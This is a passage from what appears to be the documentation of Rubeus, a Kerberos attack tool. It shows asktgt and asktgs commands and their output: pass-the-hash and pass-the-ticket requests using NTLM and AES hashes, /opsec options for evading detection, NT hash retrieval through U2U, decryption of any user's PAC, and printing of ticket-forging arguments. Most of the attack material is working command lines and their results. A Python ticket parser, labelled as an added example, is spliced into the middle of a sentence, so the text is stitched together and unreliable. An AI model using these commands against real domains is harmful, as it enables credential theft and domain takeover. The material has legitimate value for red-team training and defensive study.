.\r\nBy default, several differences exist between AS-REQ's generated by Rubeus and genuine AS-REQ's. To form\r\nAS-REQ's more in line with genuine requests, the /opsec flag can be used. This first sends an AS-REQ\r\nwithout pre-authentication; if that succeeds, the resulting AS-REP is decrypted and the TGT returned, otherwise an\r\nAS-REQ with pre-authentication is then sent. As this flag is intended to make Rubeus traffic more stealthy, it\r\ncannot by default be used with any encryption type other than aes256 and will just throw a warning and exit if\r\nanother encryption type is used. To allow other encryption types to be used with the /opsec changes, the\r\n/force flag exists.\r\nPKINIT authentication is supported with the /certificate:X argument. 
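To see what asktgt actually hands back, it helps to take the KRB-CRED apart. The Python below is an added example, not Rubeus code: it contains a minimal DER reader and walks a .kirbi the way the describe command does, reporting the ticket's service name, realm and encryption type and, from the EncKrbCredPart that Rubeus and Mimikatz leave unencrypted (etype 0), the session key type, the session key, the ticket flags and the times. Because no complete ticket is embedded here, the block also carries a small DER encoder that constructs a sample KRB-CRED for dfm.a in TESTLAB.LOCAL reusing the realm, principal names, flags, times (stored in UTC) and session key from the describe output shown further below; the ticket's encrypted part is filler bytes, which is an assumption. Any base64 blob from asktgt, dump or tgtdeleg can be passed to parse_kirbi() in the same way.

```python
# Added example (not Rubeus code): a minimal DER walker that takes a .kirbi (KRB-CRED)
# apart the way the describe command does, plus a tiny encoder used only to build
# a sample KRB-CRED for the demonstration.
import base64
from datetime import datetime

ETYPE_NAMES = {1: 'des_cbc_crc', 3: 'des_cbc_md5', 17: 'aes128_cts_hmac_sha1',
               18: 'aes256_cts_hmac_sha1', 23: 'rc4_hmac', 24: 'rc4_hmac_exp'}
# TicketFlags bit numbers per RFC 4120; bit 0 is the most significant bit of the 32-bit value.
TICKET_FLAGS = {1: 'forwardable', 2: 'forwarded', 3: 'proxiable', 4: 'proxy',
                5: 'may_postdate', 6: 'postdated', 7: 'invalid', 8: 'renewable',
                9: 'initial', 10: 'pre_authent', 11: 'hw_authent',
                12: 'transited_policy_checked', 13: 'ok_as_delegate', 15: 'name_canonicalize'}

def read_tlv(buf, pos=0):                    # DER reader; single-byte tags suffice for Kerberos
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                        # long form: next n bytes hold the length
        n = length & 0x7f
        length, pos = int.from_bytes(buf[pos:pos + n], 'big'), pos + n
    return tag, buf[pos:pos + length], pos + length

def children(buf):
    out, pos = [], 0
    while pos < len(buf):
        tag, content, pos = read_tlv(buf, pos)
        out.append((tag, content))
    return out

def fields(buf):
    # Kerberos uses [n] EXPLICIT tags: map n -> the single inner (tag, content) pair.
    return {tag & 0x1f: children(content)[0] for tag, content in children(buf)}

def as_int(inner):
    return int.from_bytes(inner[1], 'big', signed=True)

def principal(buf):                          # PrincipalName -> 'part1/part2'
    return '/'.join(c.decode('ascii') for _, c in children(fields(buf)[1][1]))

def parse_ticket(buf):                       # Ticket ::= [APPLICATION 1] SEQUENCE
    f = fields(read_tlv(buf)[1])
    enc = fields(f[3][1])                    # EncryptedData: etype, optional kvno, cipher
    return {'realm': f[1][1].decode('ascii'), 'sname': principal(f[2][1]),
            'etype': ETYPE_NAMES.get(as_int(enc[0])),
            'kvno': as_int(enc[1]) if 1 in enc else None, 'cipher_len': len(enc[2][1])}

def parse_cred_info(buf):                    # KrbCredInfo: the fields describe prints
    f = fields(buf)
    key = fields(f[0][1])
    flagbits = int.from_bytes(f[3][1][1:5], 'big') if 3 in f else 0   # byte 0 = unused bits
    def ktime(n):
        return datetime.strptime(f[n][1].decode('ascii'), '%Y%m%d%H%M%SZ') if n in f else None
    return {'UserName': principal(f[2][1]) if 2 in f else None,
            'UserRealm': f[1][1].decode('ascii') if 1 in f else None,
            'ServiceName': principal(f[9][1]) if 9 in f else None,
            'ServiceRealm': f[8][1].decode('ascii') if 8 in f else None,
            'StartTime': ktime(5), 'EndTime': ktime(6), 'RenewTill': ktime(7),
            'Flags': [TICKET_FLAGS[b] for b in sorted(TICKET_FLAGS, reverse=True)
                      if flagbits & (1 << (31 - b))],
            'KeyType': ETYPE_NAMES.get(as_int(key[0])),
            'Base64(key)': base64.b64encode(key[1][1]).decode('ascii')}

def parse_kirbi(b64):
    tag, body, _ = read_tlv(base64.b64decode(b64))
    if tag != 0x76:
        raise ValueError('not a KRB-CRED ([APPLICATION 22])')
    f = fields(read_tlv(body)[1])
    enc = fields(f[3][1])
    if as_int(enc[0]) != 0:                  # Rubeus and Mimikatz write the enc-part with etype 0
        raise ValueError('KRB-CRED enc-part is encrypted; nothing to describe offline')
    cred = fields(read_tlv(read_tlv(enc[2][1])[1])[1])    # EncKrbCredPart [APPLICATION 29]
    return {'tickets': [parse_ticket(t) for _, t in children(f[2][1])],
            'info': [parse_cred_info(c) for _, c in children(cred[0][1])]}

# DER writing, used only to construct the sample.
def tlv(tag, content):
    n = len(content)
    length = bytes([n]) if n < 0x80 else bytes([0x81, n]) if n < 0x100 else bytes([0x82, n >> 8, n & 0xff])
    return bytes([tag]) + length + content
def ctx(n, c): return tlv(0xa0 | n, c)                     # [n] EXPLICIT
def seq(*items): return tlv(0x30, b''.join(items))
def integer(v): return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, 'big'))
def gstr(s): return tlv(0x1b, s.encode('ascii'))           # GeneralString
def name(ntype, *parts): return seq(ctx(0, integer(ntype)), ctx(1, seq(*[gstr(p) for p in parts])))

def build_sample_kirbi():
    # Realm, names, flags, times and session key mirror the describe output on this page;
    # the ticket cipher is filler bytes (assumption), as it would be opaque anyway.
    ticket = tlv(0x61, seq(ctx(0, integer(5)), ctx(1, gstr('TESTLAB.LOCAL')),
                           ctx(2, name(2, 'krbtgt', 'testlab.local')),
                           ctx(3, seq(ctx(0, integer(18)), ctx(1, integer(2)),
                                      ctx(2, tlv(0x04, bytes(range(64))))))))
    session_key = bytes.fromhex('fb363c69d5e2d8dbaf900c65d6885438')
    info = seq(ctx(0, seq(ctx(0, integer(23)), ctx(1, tlv(0x04, session_key)))),
               ctx(1, gstr('TESTLAB.LOCAL')), ctx(2, name(1, 'dfm.a')),
               ctx(3, tlv(0x03, bytes.fromhex('0040e10000'))),        # TicketFlags BIT STRING
               ctx(5, tlv(0x18, b'20190225230607Z')), ctx(6, tlv(0x18, b'20190226040607Z')),
               ctx(7, tlv(0x18, b'20190304230607Z')), ctx(8, gstr('TESTLAB.LOCAL')),
               ctx(9, name(2, 'krbtgt', 'testlab.local')))
    enc_part = tlv(0x7d, seq(ctx(0, seq(info))))
    krb_cred = tlv(0x76, seq(ctx(0, integer(5)), ctx(1, integer(22)), ctx(2, seq(ticket)),
                             ctx(3, seq(ctx(0, integer(0)), ctx(2, tlv(0x04, enc_part))))))
    return base64.b64encode(krb_cred).decode('ascii')

if __name__ == '__main__':
    for field, value in parse_kirbi(build_sample_kirbi())['info'][0].items():
        print(field, ':', value)
```

The ticket body itself stays opaque (it is encrypted to the service's long-term key, here the krbtgt AES key), which is why everything describe shows about the user, flags and times comes from the KrbCredInfo in the unencrypted enc-part rather than from the ticket.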
When the private key within the PFX\r\nfile is password protected, this password can be passed with the /password:X argument. When using PKINIT\r\nauthentication the /getcredentials flag can be used to automatically request a U2U service ticket and retrieve\r\nthe account NT hash.\r\nRequesting a TGT without a PAC can be done using the /nopac switch.\r\nUsing a KDC proxy (MS-KKDCP) to make the request is possible using the /proxyurl:URL argument. The full\r\nURL for the KDC proxy is required, e.g. https://kdcproxy.example.com/kdcproxy\r\nThe /nopreauth flag can be used to send an AS-REQ without pre-authentication. The /service:SPN argument\r\ncan be used to request service tickets using AS-REQ's directly; it takes an SPN or a username.\r\nRequesting a ticket via RC4 hash for dfm.a@testlab.local, applying it to the current logon session:\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe /ptt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.1\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\dfm.a'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n 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\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\n[*] Action: Describe Ticket\r\nUserName : dfm.a\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : krbtgt/testlab.local\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/25/2019 3:06:07 PM\r\nEndTime : 2/25/2019 8:06:07 PM\r\nRenewTill : 3/4/2019 3:06:07 PM\r\nFlags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\nKeyType : 
rc4_hmac\r\nBase64(key) : +zY8adXi2NuvkAxl1ohUOA==\r\nRequesting a ticket via aes256_hmac hash for dfm.a@testlab.local, starting a new hidden process and applying\r\nthe ticket to that logon session. Note: elevation needed!\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:dfm.a /domain:testlab.local /aes256:e27b2e7b39f59c3738813a9ba8c20cd5864946f17\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : False\r\n[+] Process : 'C:\\Windows\\System32\\cmd.exe' successfully created with LOGON_TYPE = 9\r\n[+] ProcessID : 7564\r\n[+] LUID : 0x3c4c241\r\n[*] Action: Ask TGT\r\n[*] Using aes256_cts_hmac_sha1 hash: e27b2e7b39f59c3738813a9ba8c20cd5864946f179c80f60067f5cda59c3bd27\r\n[*] Target LUID : 63226433\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 234 bytes\r\n[*] Received 1620 bytes\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFujCCBbagAwIBBaEDAgEWooIEvzCCBL...(snip)...\r\n[*] Action: Import Ticket\r\n[*] Target LUID: 0x3c4c241\r\n[+] Ticket successfully imported!\r\nNote that the /luid and /createnetonly parameters require elevation!\r\nRequesting a ticket using a certificate and using /getcredentials to retrieve the NT hash:\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:harmj0y /domain:rubeus.ghostpack.local /dc:pdc1.rubeus.ghostpack.local /getcr\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGT\r\n[*] Using PKINIT with etype rc4_hmac and subject: CN=Harm J0y, CN=Users, DC=rubeus, 
DC=ghostpack, DC=local\r\n[*] Building AS-REQ (w/ PKINIT preauth) for: 'rubeus.ghostpack.local\\harmj0y'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIF9DCCBfCgAwIBBaEDAgEWooIE7DCCBOhhggTkMIIE4KADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n YnRndBsWcnViZXVzLmdob3N0cGFjay5sb2NhbA==\r\n ServiceName : krbtgt/rubeus.ghostpack.local\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 14/07/2021 02:25:33\r\n EndTime : 14/07/2021 12:25:33\r\n RenewTill : 21/07/2021 02:25:33\r\n Flags : name_canonicalize, pre_authent, initial, renewable, forwardable\r\n KeyType : rc4_hmac\r\n Base64(key) : 7MS2ajfZo4HedoK+K3dLcQ==\r\n ASREP (key) : 9B1C28A276FBBE557D0F9EE153FE24E1\r\n[*] Getting credentials using U2U\r\n CredentialInfo :\r\n Version : 0\r\n EncryptionType : rc4_hmac\r\n CredentialData :\r\n CredentialCount : 1\r\n NTLM : C69A7EA908898C23B72E65329AF7E3E8\r\nasktgs\r\nThe asktgs action will build/parse a raw TGS-REQ/TGS-REP service ticket request using the specified TGT\r\n/ticket:X supplied. This value can be a base64 encoding of a .kirbi file or the path to a .kirbi file on disk. If a\r\n/dc is not specified, the computer's current domain controller is extracted and used as the destination for the\r\nrequest traffic. The /ptt flag will \"pass-the-ticket\" and apply the resulting service ticket to the current logon\r\nsession. One or more /service:X SPNs must be specified, comma separated.\r\nThe supported encryption types in the constructed TGS-REQ will be RC4_HMAC,\r\nAES128_CTS_HMAC_SHA1, and AES256_CTS_HMAC_SHA1. In this case, the highest mutually supported\r\nencryption will be used by the KDC to build the returned service ticket. If you want to force DES, RC4, or\r\nAES128/256 keys, use /enctype:[RC4|AES128|AES256|DES].\r\nIn order to request a service ticket for an account using an enterprise principal (i.e. 
user@domain.com), the\r\n/enterprise flag can be used.\r\nBy default, several differences exist between TGS-REQs generated by Rubeus and genuine TGS-REQs. To form\r\nTGS-REQs more in line with genuine requests, the /opsec flag can be used; this will also cause an additional\r\nTGS-REQ to be sent automatically when a service ticket is requested for an account configured for unconstrained\r\ndelegation. As this flag is intended to make Rubeus traffic more stealthy, it cannot by default be used with any\r\nencryption type other than aes256 and will just throw a warning and exit if another encryption type is used.\r\nTo play with other scenarios manually, /tgs:X can be used to supply an additional ticket which is appended to\r\nthe request body. This also adds the constrained delegation KDC option and avoids dynamically\r\ndetermining the domain from the given SPN /service:X; for this reason the /targetdomain:X argument has\r\nbeen implemented to force the request to use the supplied domain, which is useful for requesting delegated service\r\ntickets from a foreign domain or tickets with usual SPNs.\r\nThe /u2u flag was implemented to request User-to-User tickets. Together with the /tgs:X argument (used to\r\nsupply the target account's TGT), the /service:X argument can be the username of the account the supplied TGT\r\nis for. The /targetuser:X argument will request a PAC of any other account by\r\ninserting a PA-FOR-USER PA data section with the target user's username.\r\nThe /printargs flag will print the arguments required to forge a ticket with the same PAC values if the PAC is\r\nreadable. This could be done by supplying the /servicekey:X argument or performing a /u2u request with a\r\nknown session key.\r\nUsing a KDC proxy (MS-KKDCP) to make the request is possible using the /proxyurl:URL argument. The full\r\nURL for the KDC proxy is required, eg. 
https://kdcproxy.exmaple.com/kdcproxy\r\nThe /keyList flag was implemented for Kerberos Key List Requests. These requests must utilise a forged partial\r\nTGT from a read-only domain controller in the /ticket:BASE64|FILE.KIRBI parameter; further details on this\r\nforged TGT are in the golden section. Furthermore, the /spn:x field must be set to the KRBTGT SPN within the\r\ndomain, eg. KRBTGT/domain.local.\r\nThe asktgs action also supports requesting service tickets via the Kerberos authentication package using LSASS.\r\nThis mode of operation can be enabled by omitting the /ticket argument. By default, the TGT associated with\r\nthe current logon session is used. An alternative logon session can be targeted by supplying the /luid:xxx\r\nargument. Local administrator privileges are required when targeting other logon sessions. Currently, only simple\r\nservice tickets can be requested via LSASS. Arguments for features such as S4U2Self, U2U, key list and KDC\r\nproxy are ignored. Requesting service tickets via LSASS can often be more opsec friendly, since Kerberos traffic\r\nwill originate from LSASS. 
This mode is also required for scenarios where Credential Guard / Remote Credential\r\nGuard is active, since dumping TGTs with Credential Guard is not possible.\r\nRequesting a TGT for dfm.a and then using that ticket to request a service ticket for the\r\n\"LDAP/primary.testlab.local\" and \"cifs/primary.testlab.local\" SPNs:\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 230 bytes\r\n[*] Received 1537 bytes\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFmjCCBZagAwIBBaEDAgEWoo...(snip)...\r\nC:\\Rubeus\u003eRubeus.exe asktgs /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip)... 
/service:LDAP/primary.testlab.local,c\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ request for: 'LDAP/primary.testlab.local'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1514 bytes\r\n[*] Received 1562 bytes\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFzjCCBcqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building TGS-REQ request for: 'cifs/primary.testlab.local'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1514 bytes\r\n[*] Received 1562 bytes\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFzjCCBcqgAwIBBaEDAgEWoo...(snip)...\r\n[*] Action: Import Ticket\r\n[+] Ticket successfully imported!\r\nC:\\Rubeus\u003eRubeus.exe klist\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: List Kerberos Tickets (Current User)\r\n [0] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/10/2019 6:44:43 PM ; 2/10/2019 11:44:09 PM ; 2/17/2019 6:44:09 PM\r\n Server Name : cifs/primary.testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\n [1] - 0x12 - aes256_cts_hmac_sha1\r\n Start/End/MaxRenew: 2/10/2019 6:44:43 PM ; 2/10/2019 11:44:09 PM ; 2/17/2019 6:44:09 PM\r\n Server Name : LDAP/primary.testlab.local @ TESTLAB.LOCAL\r\n Client Name : dfm.a @ TESTLAB.LOCAL\r\n Flags : name_canonicalize, 
ok_as_delegate, pre_authent, renewable, forwardable (40a50000)\r\nRequesting a service ticket for an AES-enabled service account, specifying that we only support RC4_HMAC:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /ticket:doIFmjCCBZagAwIBBaEDAgEWoo...(snip).../service:roast/me /enctype:rc4\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.1\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Requesting 'rc4_hmac' etype for the service ticket\r\n[*] Building TGS-REQ request for: 'roast/me'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFrjCCBaqgAwIBBaEDA...(snip)...\r\n[*] Action: Describe Ticket\r\nUserName : dfm.a\r\nUserRealm : TESTLAB.LOCAL\r\nServiceName : roast/me\r\nServiceRealm : TESTLAB.LOCAL\r\nStartTime : 2/25/2019 3:10:59 PM\r\nEndTime : 2/25/2019 8:09:54 PM\r\nRenewTill : 3/4/2019 3:09:54 PM\r\nFlags : name_canonicalize, pre_authent, renewable, forwardable\r\nKeyType : rc4_hmac\r\nBase64(key) : Gg3zZicIl5c50KGecCf8XA==\r\nBy requesting a user-to-user service ticket and including the PA-FOR-USER PA-DATA section (an S4U2self request), it\r\nis possible to get a readable PAC for any user:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /u2u /targetuser:ccob /ticket:doIFijCCBYagAwIBBaED...(snip)...3RwYWNrLmxvY2Fs /tgs\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PDC1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building User-to-User TGS-REQ request for: 'exploitph'\r\n[+] TGS request successful!\r\n[*] 
base64(ticket.kirbi):\r\n doIFKzCCBSegAwIBBaEDAgEWooIEKzCCBCdhggQjMIIEH6ADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n cGxvaXRwaA==\r\n ServiceName : exploitph\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : ccob\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 20/07/2021 22:00:07\r\n EndTime : 21/07/2021 07:59:39\r\n RenewTill : 27/07/2021 21:59:39\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : u2AYdjG4gLNIXqzb3MmwtDtE1k2NR5ty9h80w704+8Q=\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 01/01/1601 00:00:00\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 20/07/2021 21:58:44\r\n PasswordCanChange : 21/07/2021 21:58:44\r\n PasswordMustChange : 31/08/2021 21:58:44\r\n EffectiveName : ccob\r\n FullName : C Cob\r\n LogonScript :\r\n ProfilePath :\r\n HomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 0\r\n BadPasswordCount : 0\r\n UserId : 1109\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) EXTRA_SIDS\r\n UserSessionKey : 0000000000000000\r\n LogonServer : PDC1\r\n LogonDomainName : RUBEUS\r\n LogonDomainId : S-1-5-21-3237111427-1607930709-3979055039\r\n UserAccountControl : (16) NORMAL_ACCOUNT\r\n ExtraSIDCount : 1\r\n ExtraSIDs : S-1-18-2\r\n ResourceGroupCount : 0\r\n ClientName :\r\n Client Id : 20/07/2021 21:59:39\r\n Client Name : ccob\r\n UpnDns :\r\n DNS Domain Name : RUBEUS.GHOSTPACK.LOCAL\r\n UPN : ccob@rubeus.ghostpack.local\r\n Flags : 0\r\n ServerChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_MD5\r\n Signature : 79A2DC5595C76FA85155B4C65B3A0EE1 (VALID)\r\n KDCChecksum :\r\n Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256\r\n Signature : DA57618BB48EA56371E374B1 (UNVALIDATED)\r\nIf the PAC can be decrypted (by using a user-to-user request or by passing the /servicekey argument) it is possible 
to\r\nprint the arguments required to forge a ticket containing the same PAC values:\r\nC:\\Rubeus\u003eRubeus.exe asktgs /service:roast/me /printargs /servicekey:9FFB199F118556F579B415270EE835005227FCBF29\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.0.0\r\n[*] Action: Ask TGS\r\n[*] Using domain controller: PDC1.rubeus.ghostpack.local (192.168.71.80)\r\n[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket\r\n[*] Building TGS-REQ request for: 'roast/me'\r\n[+] TGS request successful!\r\n[*] base64(ticket.kirbi):\r\n doIF6jCCBeagAwIBBaEDAgEWooIE5zCCBONhggTfMIIE26ADAgEFoRgbFlJVQkVVUy5HSE9TVFBBQ0su\r\n ...(snip)...\r\n AgECoQ0wCxsFcm9hc3QbAm1l\r\n ServiceName : roast/me\r\n ServiceRealm : RUBEUS.GHOSTPACK.LOCAL\r\n UserName : harmj0y\r\n UserRealm : RUBEUS.GHOSTPACK.LOCAL\r\n StartTime : 20/07/2021 00:02:27\r\n EndTime : 20/07/2021 09:57:46\r\n RenewTill : 26/07/2021 23:57:46\r\n Flags : name_canonicalize, pre_authent, renewable, forwardable\r\n KeyType : aes256_cts_hmac_sha1\r\n Base64(key) : U9Vnk0QnOmByQqF7i+5ujkinm9pRrevcRhw1sKVEVi4=\r\n Decrypted PAC :\r\n LogonInfo :\r\n LogonTime : 19/07/2021 23:00:38\r\n LogoffTime :\r\n KickOffTime :\r\n PasswordLastSet : 14/07/2021 02:07:12\r\n PasswordCanChange : 15/07/2021 02:07:12\r\n PasswordMustChange :\r\n EffectiveName : harmj0y\r\n FullName : Harm J0y\r\n LogonScript :\r\n ProfilePath :\r\n HomeDirectory :\r\n HomeDirectoryDrive :\r\n LogonCount : 8\r\n BadPasswordCount : 0\r\n UserId : 1106\r\n PrimaryGroupId : 513\r\n GroupCount : 1\r\n Groups : 513\r\n UserFlags : (32) 